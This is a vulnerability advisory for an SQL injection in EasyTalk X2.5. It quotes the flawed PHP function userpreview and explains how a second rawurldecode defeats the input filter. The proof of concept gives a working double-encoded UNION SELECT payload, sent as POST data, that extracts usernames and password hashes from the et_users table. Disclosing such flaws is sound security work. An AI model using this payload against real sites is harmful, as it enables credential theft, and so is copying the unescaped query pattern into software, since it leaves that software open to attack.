### Summary:
An SQL injection in the latest version of EasyTalk_X2.5.
### Details:
The vulnerability is in /Home/Lib/Action/ApiAction.class.php, in the following function:
```php
public function userpreview() {
    // POST value is URL-decoded a second time after the request filter has run
    $username=trim(rawurldecode($this->_post('username')));
    if ($username) {
        parent::init();
        // $username is interpolated into the WHERE clause without escaping
        $user = M('Users')->where("user_name='$username'")->find();
        if ($user) {
            if ($user['cityid']) {//user's location
                $dtModel=M('District');
                $pdata = $dtModel->where("id='$user[cityid]'")->find();
                $pdata2 = $dtModel->where("id='$pdata[upid]'")->find();
                $user['live_city']=$pdata2['name'].' '.$pdata['name'];
            }
            $isfriend=D('Friend')->followstatus($user['user_id'],$this->my['user_id']);
            $f="<span id='followsp2_".$user['user_id']."'>";
            if($isfriend[$user['user_id']]==1){
                $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico2.gif'> ".L('already_follow')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
            }else if ($isfriend[$user[user_id]]==3){
                $f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico.gif'> ".L('follow_followed')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
            }else{
                $f.="<a class='bh' onclick=\"followop('addfollow/user_id/{$user[user_id]}','gz','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('have_a_follow')."</a>";
            }
            $f.="</span>";
            if ($user['user_id']==$this->my['user_id']) {
                $body2='';
            } else {
                $body2='<div class="fleft"><input type="button" value="'.L('send_message').'" onclick="sendprimsgbox(\''.$user['nickname'].'\')" class="button5"> <input type="button" value="@TA" onclick="talkBox(\'@'.$user['nickname'].' \')" class="button5"></div><div class="fright">'.$f.'</div>';
            }
            if(time()-$user['last_login']<=600){
                if($user['isadmin']>0){
                    $zxico='<span class="adminico"> '.L('admin_online').'</span>';
                } else {
                    $zxico='<span class="uonlineico"> '.L('user_online').'</span>';
                }
            } else {
                $zxico='<span class="uofflineico"> '.L('user_offline').'</span>';
            }
            echo '<div class="body1">
<div class="limg"><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank"><img src="'.sethead($user['user_head']).'" width="50px" height="50px"></a></div>
<div class="linfo">
<p>
<div class="fleft">
<span class="'.setvip($user['user_auth']).'" '.viptitle($user['user_auth']).'><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['nickname'].'</a></span>
</div>
<div class="fright" style="width:90px;font-size:12px">'.$zxico.'</div>
<div class="clearline"></div>
</p>
<p>'.($user['user_gender']==1?L('male'):L('female')).' '.$user['live_city'].'</p>
<p>'.L('follow').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=following" target="_blank">'.$user['follow_num'].'</a> '.L('follower').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=follower" target="_blank">'.$user['followme_num'].'</a> '.L('talk').'<a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['msg_num'].'</a></p>
</div>
<div class="clearline"></div>
<div class="linfo2">';
            if ($user['user_auth']) {
                echo getsubstr($user['auth_info'],0,35);
            } else {
                echo L('user_info').':'.getsubstr($user['user_info']?$user['user_info']:L('nothing_write'),0,35);
            }
            echo '</div>
</div>
<div class="body2">'.$body2.'</div>';
        } else {
            echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
        }
    } else {
        echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
    }
}
```
The line
```php
$username=trim(rawurldecode($this->_post('username')));
```
calls rawurldecode on the POST value, which decodes it a second time; that second decoding is what makes the injection possible (a double-decoding injection).
### Proof of concept:
![sql3.jpg](https://images.seebug.org/upload/201402/201606133d574497983a9c551612990c2cde3d09.jpg)
URL:
http://192.168.116.129/easytalk/?m=api&a=userpreview
POST data:
username=my5t3ry%2527/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users%23
The query that finally reaches the database is:
```sql
SELECT * FROM `et_users` WHERE user_name='my5t3ry'/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users#' LIMIT 1
```